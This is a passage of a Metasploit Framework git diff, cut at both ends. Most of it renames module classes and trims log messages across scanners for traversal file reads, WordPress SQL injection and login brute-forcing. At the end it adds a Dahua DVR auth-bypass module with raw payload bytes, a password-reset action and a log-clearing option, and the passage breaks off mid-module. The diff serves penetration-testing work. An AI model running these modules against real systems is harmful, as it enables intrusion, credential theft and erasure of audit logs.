Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/webdav_scanner.rb b/modules/auxiliary/scanner/http/webdav_scanner.rb index 42970aac95..00fab61f82 100644 --- a/modules/auxiliary/scanner/http/webdav_scanner.rb +++ b/modules/auxiliary/scanner/http/webdav_scanner.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/webdav_website_content.rb b/modules/auxiliary/scanner/http/webdav_website_content.rb index 4fc1b55c75..489dea1a5e 100644 --- a/modules/auxiliary/scanner/http/webdav_website_content.rb +++ b/modules/auxiliary/scanner/http/webdav_website_content.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/webpagetest_traversal.rb b/modules/auxiliary/scanner/http/webpagetest_traversal.rb index cb3381d0c8..4641786e14 100644 --- a/modules/auxiliary/scanner/http/webpagetest_traversal.rb +++ b/modules/auxiliary/scanner/http/webpagetest_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/wildfly_traversal.rb b/modules/auxiliary/scanner/http/wildfly_traversal.rb index cf05c0858a..3f79cd3b9f 100644 --- a/modules/auxiliary/scanner/http/wildfly_traversal.rb +++ b/modules/auxiliary/scanner/http/wildfly_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Attempting to download: #{datastore['RELATIVE_FILE_PATH']}") + vprint_status("Attempting to download: #{datastore['RELATIVE_FILE_PATH']}") traversal = "..\\" * datastore['TRAVERSAL_DEPTH'] res = send_request_raw({ @@ -62,9 +62,9 @@ class Metasploit3 < Msf::Auxiliary res.body, fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - vprint_error("#{peer} - Nothing was downloaded") + vprint_error("Nothing was downloaded") end end end diff --git a/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb b/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb index 12e6ed9e4a..34c8503a2a 100644 --- a/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb +++ b/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -42,7 +42,7 @@ class Metasploit4 < Msf::Auxiliary left_marker = Rex::Text.rand_text_alpha(5) flag = Rex::Text.rand_text_alpha(5) - vprint_status("#{peer} - Checking host") + vprint_status("Checking host") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/'), @@ -55,14 +55,14 @@ class Metasploit4 < Msf::Auxiliary }) unless res && res.body - vprint_error("#{peer} - Server did not respond in an expected way") + vprint_error("Server did not respond in an expected way") return end result = res.body =~ /#{left_marker}#{flag}#{right_marker}/ if result - print_good("#{peer} - Vulnerable to unauthenticated SQL injection within CP Multi-View Calendar 1.1.4 for Wordpress") + print_good("Vulnerable to unauthenticated SQL injection within CP Multi-View Calendar 1.1.4 for Wordpress") report_vuln({ :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb b/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb index 1584fd9278..1576076911 100644 --- a/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb +++ b/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner @@ -49,12 +49,12 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless wordpress_and_online? - print_error("#{peer} - Looks like this site is no WordPress blog") + print_error("Looks like this site is no WordPress blog") return end unless wordpress_xmlrpc_enabled? - print_error("#{peer} - XMLRPC interface is not enabled") + print_error("XMLRPC interface is not enabled") return end @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary ) if res.nil? || res.code == 500 - print_good("#{peer} - vulnerable to GHOST") + print_good("vulnerable to GHOST") report_vuln( :host => ip, :proto => 'tcp', @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary :sname => datastore['SSL'] ? "https" : "http" ) else - print_status("#{peer} - target not vulnerable to GHOST") + print_status("target not vulnerable to GHOST") end end diff --git a/modules/auxiliary/scanner/http/wordpress_login_enum.rb b/modules/auxiliary/scanner/http/wordpress_login_enum.rb index 2019d21f71..72acdebe94 100644 --- a/modules/auxiliary/scanner/http/wordpress_login_enum.rb +++ b/modules/auxiliary/scanner/http/wordpress_login_enum.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb b/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb index d52d6c8f69..12f8841bbe 100644 --- a/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb +++ b/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/wordpress_multicall' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/wordpress_pingback_access.rb b/modules/auxiliary/scanner/http/wordpress_pingback_access.rb index 702d4b6bcc..32a55bdcbb 100644 --- a/modules/auxiliary/scanner/http/wordpress_pingback_access.rb +++ b/modules/auxiliary/scanner/http/wordpress_pingback_access.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/wordpress_scanner.rb b/modules/auxiliary/scanner/http/wordpress_scanner.rb index e4c5feef18..c8249e2faf 100644 --- a/modules/auxiliary/scanner/http/wordpress_scanner.rb +++ b/modules/auxiliary/scanner/http/wordpress_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb b/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb index fb7097671a..02f774518a 100644 --- a/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb +++ b/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/wordpress_rpc' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner include Msf::Auxiliary::AuthBrute @@ -51,7 +51,7 @@ class Metasploit3 < Msf::Auxiliary return :abort end - print_status("#{peer} - Starting XML-RPC login sweep...") + print_status("Starting XML-RPC login sweep...") cred_collection = Metasploit::Framework::CredentialCollection.new( blank_passwords: datastore['BLANK_PASSWORDS'], diff --git a/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb b/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb index 36448f4262..5284a81933 100644 --- a/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb +++ b/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner @@ -38,7 +38,7 @@ class Metasploit4 < Msf::Auxiliary left_marker = Rex::Text.rand_text_alpha(5) flag = Rex::Text.rand_text_alpha(5) - vprint_status("#{peer} - Checking host") + vprint_status("Checking host") res = send_request_cgi({ 'uri' => wordpress_url_admin_ajax, @@ -49,14 +49,14 @@ class Metasploit4 < Msf::Auxiliary } }) unless res && res.body - vprint_error("#{peer} - Server did not respond in an expected way") + vprint_error("Server did not respond in an expected way") return end result = res.body =~ /#{left_marker}#{flag}#{right_marker}/ if result - print_good("#{peer} - Vulnerable to unauthenticated SQL injection within Contus Video Gallery 2.7 for Wordpress") + print_good("Vulnerable to unauthenticated SQL injection within Contus Video Gallery 2.7 for Wordpress") report_vuln({ :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb b/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb index 507b311f36..1f8bf30ff2 100644 --- a/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress @@ -74,9 +74,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.") + print_error("Nothing was downloaded. You can try to change the DEPTH parameter.") end end end diff --git a/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb b/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb index 58f70a893b..33de5081ae 100644 --- a/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress @@ -69,9 +69,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - vprint_error("#{peer} - Nothing was downloaded. Check the path and the traversal parameters.") + vprint_error("Nothing was downloaded. Check the path and the traversal parameters.") end end end diff --git a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb index 6c8259c09f..800c6a897f 100644 --- a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb +++ b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary ) temp = JSON.parse(res.body.gsub(/exportarticle\(/, "").gsub(/\)/, "")) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, JSON::ParserError => e - print_error("#{peer} - The following Error was encountered: #{e.class}") + print_error("The following Error was encountered: #{e.class}") return end @@ -77,9 +77,9 @@ class Metasploit3 < Msf::Auxiliary ip, res_clean ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try checking the POSTID parameter.") + print_error("Nothing was downloaded. You can try checking the POSTID parameter.") end end end diff --git a/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb b/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb index ca60253e0c..fce1d04daf 100644 --- a/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress @@ -72,9 +72,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.") + print_error("Nothing was downloaded. You can try to change the DEPTH parameter.") end end end diff --git a/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb b/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb index accb58a7f7..fa90614818 100644 --- a/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'json' require 'nokogiri' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.redirect? && res.redirection location = res.redirection - print_status("#{peer} - Following redirect to #{location}") + print_status("Following redirect to #{location}") res = send_request_cgi( 'uri' => location, 'method' => 'GET', @@ -93,20 +93,20 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Trying to login as: #{user}") + vprint_status("Trying to login as: #{user}") cookie = wordpress_login(user, password) if cookie.nil? - print_error("#{peer} - Unable to login as: #{user}") + print_error("Unable to login as: #{user}") return end - vprint_status("#{peer} - Trying to get nonce...") + vprint_status("Trying to get nonce...") nonce = get_nonce(cookie) if nonce.nil? - print_error("#{peer} - Can not get nonce after login") + print_error("Can not get nonce after login") return end - vprint_status("#{peer} - Got nonce: #{nonce}") + vprint_status("Got nonce: #{nonce}") traversal = "../" * datastore['DEPTH'] filename = datastore['DIRPATH'] @@ -144,9 +144,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try to change the DIRPATH.") + print_error("Nothing was downloaded. You can try to change the DIRPATH.") end end end diff --git a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb index 4c8334e289..b4f21db7cf 100644 --- a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary ) unless res && res.body - vprint_error("#{peer} - Server did not respond in an expected way.") + vprint_error("Server did not respond in an expected way.") return end @@ -81,9 +81,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - vprint_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter or verify the correct filename.") + vprint_error("Nothing was downloaded. You can try to change the DEPTH parameter or verify the correct filename.") end end end diff --git a/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb b/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb index 78e9e72086..736f5256b9 100644 --- a/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.redirect? && res.redirection location = res.redirection - print_status("#{peer} - Following redirect to #{location}") + print_status("Following redirect to #{location}") res = send_request_cgi( 'uri' => location, 'method' => 'GET', @@ -116,25 +116,25 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Trying to login as: #{user}") + vprint_status("Trying to login as: #{user}") cookie = wordpress_login(user, password) if cookie.nil? - print_error("#{peer} - Unable to login as: #{user}") + print_error("Unable to login as: #{user}") return end - vprint_status("#{peer} - Trying to get nonce...") + vprint_status("Trying to get nonce...") nonce = get_nonce(cookie) if nonce.nil? - print_error("#{peer} - Can not get nonce after login") + print_error("Can not get nonce after login") return end - vprint_status("#{peer} - Got nonce: #{nonce}") + vprint_status("Got nonce: #{nonce}") - vprint_status("#{peer} - Trying to download filepath.") + vprint_status("Trying to download filepath.") file_path = down_file(cookie, nonce) if file_path.nil? - print_error("#{peer} - Error downloading filepath.") + print_error("Error downloading filepath.") return end @@ -164,9 +164,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try to change the FILEPATH.") + print_error("Nothing was downloaded. You can try to change the FILEPATH.") end end end diff --git a/modules/auxiliary/scanner/http/xpath.rb b/modules/auxiliary/scanner/http/xpath.rb index 4c6f1bcdfe..8ebe785795 100644 --- a/modules/auxiliary/scanner/http/xpath.rb +++ b/modules/auxiliary/scanner/http/xpath.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/yaws_traversal.rb b/modules/auxiliary/scanner/http/yaws_traversal.rb index 26e8aa1815..7947f768c2 100644 --- a/modules/auxiliary/scanner/http/yaws_traversal.rb +++ b/modules/auxiliary/scanner/http/yaws_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/zabbix_login.rb b/modules/auxiliary/scanner/http/zabbix_login.rb index 878b786208..16256268f9 100644 --- a/modules/auxiliary/scanner/http/zabbix_login.rb +++ b/modules/auxiliary/scanner/http/zabbix_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/zabbix' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb b/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb index c50a870fe7..c950811aa6 100644 --- a/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb +++ b/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb b/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb index 095f3b2717..c17adaf2b9 100644 --- a/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb +++ b/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/imap/imap_version.rb b/modules/auxiliary/scanner/imap/imap_version.rb index 74ff3e3e3f..9999280be5 100644 --- a/modules/auxiliary/scanner/imap/imap_version.rb +++ b/modules/auxiliary/scanner/imap/imap_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Imap include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ip/ipidseq.rb b/modules/auxiliary/scanner/ip/ipidseq.rb index aa3e1a9244..206908b32f 100644 --- a/modules/auxiliary/scanner/ip/ipidseq.rb +++ b/modules/auxiliary/scanner/ip/ipidseq.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'timeout' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb b/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb index abc8d604bd..a8e64e9258 100644 --- a/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb +++ b/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/ipmi' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb index c6d1f16d8e..6627284b08 100644 --- a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb +++ b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/ipmi' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ipmi/ipmi_version.rb b/modules/auxiliary/scanner/ipmi/ipmi_version.rb index 0c497970b6..ca209d0b99 100644 --- a/modules/auxiliary/scanner/ipmi/ipmi_version.rb +++ b/modules/auxiliary/scanner/ipmi/ipmi_version.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/ipmi' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/kademlia/server_info.rb b/modules/auxiliary/scanner/kademlia/server_info.rb index 0f1c4508df..2eaf5ce94b 100644 --- a/modules/auxiliary/scanner/kademlia/server_info.rb +++ b/modules/auxiliary/scanner/kademlia/server_info.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::Kademlia diff --git a/modules/auxiliary/scanner/llmnr/query.rb b/modules/auxiliary/scanner/llmnr/query.rb index 74a8687efb..a09506761e 100644 --- a/modules/auxiliary/scanner/llmnr/query.rb +++ b/modules/auxiliary/scanner/llmnr/query.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::LLMNR diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb index 19a35e271d..7c4b0c7d2c 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb index c3e9ac94a5..ba3eef232a 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_version.rb b/modules/auxiliary/scanner/lotus/lotus_domino_version.rb index 6df88ba9ee..f0c187ef91 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_version.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/mdns/query.rb b/modules/auxiliary/scanner/mdns/query.rb index 4412818e31..507192479f 100644 --- a/modules/auxiliary/scanner/mdns/query.rb +++ b/modules/auxiliary/scanner/mdns/query.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::MDNS diff --git a/modules/auxiliary/scanner/misc/cctv_dvr_login.rb b/modules/auxiliary/scanner/misc/cctv_dvr_login.rb index 2a1337914a..bede37a4c5 100644 --- a/modules/auxiliary/scanner/misc/cctv_dvr_login.rb +++ b/modules/auxiliary/scanner/misc/cctv_dvr_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb new file mode 100644 index 0000000000..c2a0551cab --- /dev/null +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -0,0 +1,394 @@ +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize + super( + 'Name' => %q(Dahua DVR Auth Bypass Scanner), + 'Description' => %q(Scans for Dahua-based DVRs and then grabs settings. Optionally resets a user's password and clears the device logs), + 'Author' => [ + 'Tyler Bennett - Talos Consulting', # Metasploit module + 'Jake Reynolds - Depth Security', # Vulnerability Discoverer + 'Jon Hart ', # improved metasploit module + 'Nathan McBride' # regex extraordinaire + ], + 'References' => [ + [ 'CVE', '2013-6117' ], + [ 'URL', 'https://depthsecurity.com/blog/dahua-dvr-authentication-bypass-cve-2013-6117' ] + ], + 'License' => MSF_LICENSE, + 'DefaultAction' => 'VERSION', + 'Actions' => + [ + [ 'CHANNEL', { 'Description' => 'Obtain the channel/camera information from the DVR' } ], + [ 'DDNS', { 'Description' => 'Obtain the DDNS settings from the DVR' } ], + [ 'EMAIL', { 'Description' => 'Obtain the email settings from the DVR' } ], + [ 'GROUP', { 'Description' => 'Obtain the group information the DVR' } ], + [ 'NAS', { 'Description' => 'Obtain the NAS settings from the DVR' } ], + [ 'RESET', { 'Description' => 'Reset an existing user\'s password on the DVR' } ], + [ 'SERIAL', { 'Description' => 'Obtain the serial number from the DVR' } ], + [ 'USER', { 'Description' => 'Obtain the user information from the DVR' } ], + [ 'VERSION', { 'Description' => 'Obtain the version of the DVR' } ] + ] + ) + + deregister_options('RHOST') + register_options([ + OptString.new('USERNAME', [false, 'A username to reset', '888888']), + OptString.new('PASSWORD', [false, 'A password to reset the user with, if not set a random pass will be generated.']), + OptBool.new('CLEAR_LOGS', [true, %q(Clear the DVR logs when we're done?), true]), + Opt::RPORT(37777) + ]) + end + + U1 = "\xa1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + DVR_RESP = "\xb1\x00\x00\x58\x00\x00\x00\x00" + # Payload to grab version of the DVR + VERSION = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # Payload to grab Email Settings of the DVR + EMAIL = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \ + "\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # Payload to grab DDNS Settings of the DVR + DDNS = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \ + "\x8c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # Payload to grab NAS Settings of the DVR + NAS = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \ + "\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # Payload to grab the Channels that each camera is assigned to on the DVR + CHANNELS = "\xa8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 